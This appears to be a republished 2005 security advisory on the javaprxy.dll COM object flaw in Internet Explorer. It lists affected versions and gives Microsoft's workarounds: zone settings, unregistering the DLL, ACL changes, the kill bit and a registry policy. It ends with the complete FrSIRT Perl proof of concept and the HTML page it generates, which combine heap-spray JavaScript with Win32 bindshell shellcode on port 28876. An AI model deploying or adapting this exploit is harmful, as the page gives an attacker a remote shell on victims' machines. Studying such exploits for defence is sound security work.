‘Microsoft Internet Explorer Javaprxy.dll COM Object Execution (Exploit)’

Summary

‘Internet Explorer allows users to utilize Windows’s COM Objects. A vulnerability with javaprxy.dll allows attackers to craft a special HTML code that will cause Internet Explorer to execute a remote command by using one of Windows’s COM Objects.’

Credit:

‘The information has been provided by frsirt.
http://www.sec-consult.com/184.html.
The vendor advisory can be found at: http://www.microsoft.com/technet/security/advisory/903144.mspx


Details

Vulnerable Systems:
 * Internet Explorer 5.01 Service Pack 3
 * Internet Explorer 5.01 Service Pack 4
 * Internet Explorer 6 Service Pack 1
 * Internet Explorer 6
 * Internet Explorer 5.5 Service Pack 2

A vulnerability was identified in Microsoft Internet Explorer, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to an error in the ‘javaprxy.dll’ COM Object when instantiated in Internet Explorer via a specially crafted HTML tag, which could be exploited via a malicious Web page to compromise and take complete control of a vulnerable system.

Workarounds:
Set Internet and Local intranet security zone settings to High to prompt before running ActiveX controls in these zones
You can help protect against this vulnerability by changing your settings for the Internet security zone to prompt before running ActiveX controls. You can do this by setting your browser security to High.

To raise the browsing security level in Microsoft Internet Explorer, follow these steps:
 1. On the Internet Explorer Tools menu, click Internet Options.
 2. In the Internet Options dialog box, click the Security tab, and then click the Internet icon.
 3. Under Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.

Note If no slider is visible, click Default Level, and then move the slider to High.

Note Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.

Impact of Workaround:
There are side effects to prompting before running ActiveX controls. Many Web sites that are on the Internet or on an intranet use ActiveX to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX controls to provide menus, ordering forms, or even account statements. Prompting before running ActiveX controls is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX controls. If you do not want to be prompted for all these sites, use the ‘Restrict Web sites to only your trusted Web sites’ workaround.

Change your Internet Explorer to prompt before running or disable ActiveX controls in the Internet and Local intranet security zone
You can help protect against this vulnerability by changing your settings to prompt before running ActiveX controls. To do this, follow these steps:

 1. In Internet Explorer, click Internet Options on the Tools menu.
 2. Click the Security tab.
 3. Click Internet, and then click Custom Level.
 4. Under Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.
 5. Click Local intranet, and then click Custom Level.
 6. Under Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.
 7. Click OK two times to return to Internet Explorer.

Impact of Workaround:
There are side effects to prompting before running ActiveX controls. Many Web sites that are on the Internet or on an intranet use ActiveX to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX controls to provide menus, ordering forms, or even account statements. Prompting before running ActiveX controls is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX controls. If you do not want to be prompted for all these sites, use the ‘Restrict Web sites to only your trusted Web sites’ workaround.

Unregister the Javaprxy.dll COM Object
To unregister Javaprxy.dll, follow these steps:
 1. Click Start, click Run, type ‘regsvr32 /u javaprxy.dll’ (without the quotation marks), and then click OK.
 2. A dialog box appears to confirm that the unregistration process has succeeded. Click OK to close the dialog box.
 3. Close Internet Explorer, and reopen it for the changes to take effect.

Impact of Workaround:Applications that require the Microsoft Java Virtual Machine may no longer function correctly.

Modify the Access Control List on Javaprxy.dll to be more restrictive
To modify the Access Control List (ACL) on Javaprxy.dll to be more restrictive, follow these steps:
 1. Click Start, click Run, type ‘cmd’ (without the quotation marks), and then click OK.
 2. Type the following command at a command prompt. Make a note of the current ACL s that are on the file (including inheritance settings) for future reference in case you have to undo this modification:

cacls %windir%system32javaprxy.dll

 3.Type the following command at a command prompt to deny the everyone group access to this file:

cacls %windir%system32javaprxy.dll /d everyone

 4. Close Internet Explorer, and reopen it for the changes to take effect.

Impact of Workaround:
Applications that require the Microsoft Java Virtual Machine may no longer function correctly.

Disable the Javaprxy.dll COM object from running in Internet Explorer
Disable attempts to instantiate the Javaprxy.dll control in Internet Explorer by setting the kill bit for the control.

Warning If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.

The CLSID for the Javaprxy.dll control is 03D9F3F2-B0E3-11D2-B081-006008039BF0

For detailed steps about stopping a control from running in Internet Explorer, see Microsoft Knowledge Base Article 240797. Follow these steps and create a Compatibility Flags value in the registry to prevent the Javaprxy.dll control from being instantiated in Internet Explorer.

Restrict access to Javaprxy.dll in Internet Explorer by using a Software Restriction Policy
To restrict access to Javaprxy.dll in Internet Explorer on Windows XP and later versions you can create a Software Restriction Policy. To create this policy, use a registry script or create a Group Policy setting to block the loading of the Javaprxy.dll.

Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the ‘Changing Keys And Values’ Help topic in Registry Editor (Regedit.exe) or view the ‘Add and Delete Information in the Registry’ and ‘Edit Registry Data’ Help topics in Regedt32.exe.

We recommend that you back up the registry before you edit it.

Use the following .reg file to un-register Javaprxy.dll in Internet Explorer. You can copy the following text, paste it into a text editor such as Notepad, and then save the file with the .reg file name extension.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsSafer CodeIdentifiers]
‘TransparentEnabled’=dword:00000002

[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsSafer CodeIdentifiersPaths{09687f8a-0ca9-4639-b295-a3f5b5be8fc5}]
‘LastModified’=hex(b):50,09,1f,b1,04,4a,c5,01
‘Description’=’Block javaprxy.dll’
‘SaferFlags’=dword:00000000
‘ItemData’=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,
73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6a,00,61,00,76,00,
61,00,70,00,72,00,78,00,79,00,2e,00,64,00,6c,00,6c,00,00,00

Impact of Workaround:
Applications that require the Microsoft Java Virtual Machine may no longer function correctly.

Remove the Microsoft Java Virtual Machine from your system using the Java Removal Tool
Customers can use the MSJVM Diagnostic Tool available from the Microsoft Java Virtual Machine Support page to perform remote and local scans to detect for the presence of MSJVM and MSJVM-related software.

Customers can then use the Java Removal Tool to permanently remove the Microsoft Java Virtual Machine from their system. For more information about how to qualify for access to the Java Removal Tool from Microsoft Product Support Services, see Microsoft Knowledge Base Article 826878.

Warning: Removing the Microsoft Java Virtual Machine from your system is permanent. Microsoft cannot provide Windows operating system recovery media to you that includes the MSJVM for reinstallation. Microsoft no longer includes the MSJVM in Windows operating system products.

Impact of Workaround: Applications that require the Microsoft Java Virtual Machine will no longer function correctly.

Vendor Status:
The vendor has issued a patch for the vulnerability.

Exploit:
<!–
(update) frsirt updated the comments to reflect skylined’s code + gpl. /str0ke

Perl code is commented so people can test the vuln on their IE /str0ke

#!/usr/bin/perl
#
###########################
#
# Microsoft Internet Explorer ‘javaprxy.dll’ COM Object Exploit -Unpatched-
#
# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >
# Bindshell on port 28876 – Based on Berend-Jan Wever’s IE exploit
# 01 July 2005
#
# Description – http://www.frsirt.com/english/advisories/2005/0935
# Workarounds – http://www.microsoft.com/technet/security/advisory/903144.mspx
# sec-consult – http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to ‘High’ or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1
# Internet Explorer 6 for Microsoft Windows XP Service Pack 2
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition
#
# Usage : perl iejavaprxyexploit.pl > mypage.html
#
###########################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place – Suite 330
# Boston, MA 02111-1307
# USA.
#
###########################

# header
my $header = ‘<html><body>n<SCRIPT language=’javascript’>n’;

# Win32 bindshell (port 28876) – SkyLined
my $shellcode = ‘shellcode = unescape(‘%u4343’+’%u4343’+’%u43eb’.
‘%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea’.
‘%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7’.
‘%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b’.
‘%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64’.
‘%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c’.
‘%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe’.
‘%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0’.
‘%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050’.
‘%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6’.
‘%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650’.
‘%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa’.
‘%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656’.
‘%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1’.
‘%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353’.
‘%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353’.
‘%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe’.
‘%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff’.
‘%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb’);n’;

# Memory
my $code = ‘bigblock = unescape(‘%u0D0D%u0D0D’);n’.
‘headersize = 20;n’.
‘slackspace = headersize+shellcode.lengthn’.
‘while (bigblock.length<slackspace) bigblock+=bigblock;n’.
‘fillblock = bigblock.substring(0, slackspace);n’.
‘block = bigblock.substring(0, bigblock.length-slackspace);n’.
‘while(block.length+slackspace<0x40000) block = block+block+fillblock;n’.
‘memory = new Array();n’.
‘for (i=0;i<750;i++) memory[i] = block + shellcode;n’.
‘</SCRIPT>n’;

# javaprxy.dll
my $clsid = ’03D9F3F2-B0E3-11D2-B081-006008039BF0′;

# footer

my $footer = ‘<object classid=’CLSID:’.$clsid.”></object>n’.
‘Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploitn’.
‘by the FrSIRT < http://www.frsirt.com >n’.
‘Solution – http://www.frsirt.com/english/advisories/2005/0935’.
‘</body><script>location.reload();</script></html>’;

# print ‘Content-Type: text/html;rnrn’; # if you are in cgi-bin
print ‘$header $shellcode $code $footer’;

–>

<html><body>
<SCRIPT language=’javascript’>
 shellcode = unescape(‘%u4343’ + ‘%u4343’ + ‘%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea’ + ‘%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a’ + ‘%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df’ + ‘%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a’ +’%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031′ + ‘%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868’ + ‘%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768’ + ‘%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89′ +’%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50’ + ‘%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050’ + ‘%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff’ + ‘%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe’ + ‘%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be’ + ‘%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34’ + ‘%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8’ + ‘%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1’ + ‘%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350’ + ‘%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0’ + ‘%u5353%u5453%u5350%u5353%u5343%u534b%u5153’ + ‘%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031’ + ‘%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87’ + ‘%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb’);
 bigblock = unescape(‘%u0D0D%u0D0D’);
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<750;i++) memory[i] = block + shellcode;
</SCRIPT>
 <object classid=’CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0’></object>
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
by the FrSIRT < http://www.frsirt.com >
</body><script>location.reload();</script></html>

#EOF’

Categories: Windows